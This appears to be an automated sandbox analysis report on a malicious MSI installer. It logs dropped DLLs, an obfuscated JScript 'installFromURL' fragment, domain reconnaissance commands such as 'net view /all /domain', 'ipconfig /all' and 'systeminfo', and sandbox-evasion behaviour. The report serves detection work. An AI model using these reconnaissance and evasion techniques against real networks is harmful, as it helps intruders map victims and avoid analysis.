Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source:	Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Echo("failed: " + e.message); }}installFromURL();}

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,

6_2_00000001800033E0

PE file contains an invalid checksum

Source: Update_3b24da5a.dll.6.dr	Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
Source: 360total.dll.2.dr	Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c

PE file contains sections with non-standard names

Source: 360total.dll.2.dr	Static PE information: section name: yhDm^
Source: Update_3b24da5a.dll.6.dr	Static PE information: section name: yhDm^

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071323C push ecx; ret	4_2_0071324F
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180010451 push rcx; ret	6_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001045A push rcx; ret	6_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018017500F push rdx; iretd	6_2_0000000180175010

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSI3B6A.tmp

Jump to behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Drops PE files

Source: C:\Windows\System32\rundll32.exe	File created: :wtfbbq (copy)	Jump to dropped file
Source: C:\Windows\System32\rundll32.exe	File created: C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\sharepoint\360total.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AAC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3B6A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A4C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A7C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI39EE.tmp	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AAC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3B6A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A4C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A7C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI39EE.tmp	Jump to dropped file

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,

6_2_0000000180049AEC

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

6_2_0000000180062148

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\rundll32.exe

Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection,

6_2_00000001800655A8

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC

6_2_0000000180049AEC

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Contains functionality to query network adapater information

Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	6_2_00000187EC8568E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	6_2_00000187EC857FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	7_2_00000201DAAE7FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	7_2_00000201DAAE68E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	8_2_000001A3795068E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	8_2_000001A379507FA8

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 807			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 8931			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: :wtfbbq (copy)	Jump to dropped file
Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\360total.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3AAC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3A4C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3A7C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI39EE.tmp	Jump to dropped file

Found evasive API chain checking for process token information

Source: C:\Windows\Installer\MSI3B6A.tmp

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\Installer\MSI3B6A.tmp	API coverage: 7.4 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 1.6 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 8.4 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC

6_2_0000000180049AEC

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wscript.exe TID: 380	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 6540	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724	Thread sleep count: 261 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724	Thread sleep time: -261000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 5812	Thread sleep count: 807 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 5812	Thread sleep time: -80700s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724	Thread sleep count: 8931 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724	Thread sleep time: -8931000s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Queries the current domain controller via net

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072AF79 FindFirstFileExW,	4_2_0072AF79
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	6_2_00000187EC85A350
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC851A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	6_2_00000187EC851A08
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	7_2_00000201DAAEA350
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	7_2_00000201DAAE1A08
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_000001A37950A350
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379501A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_000001A379501A08

Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
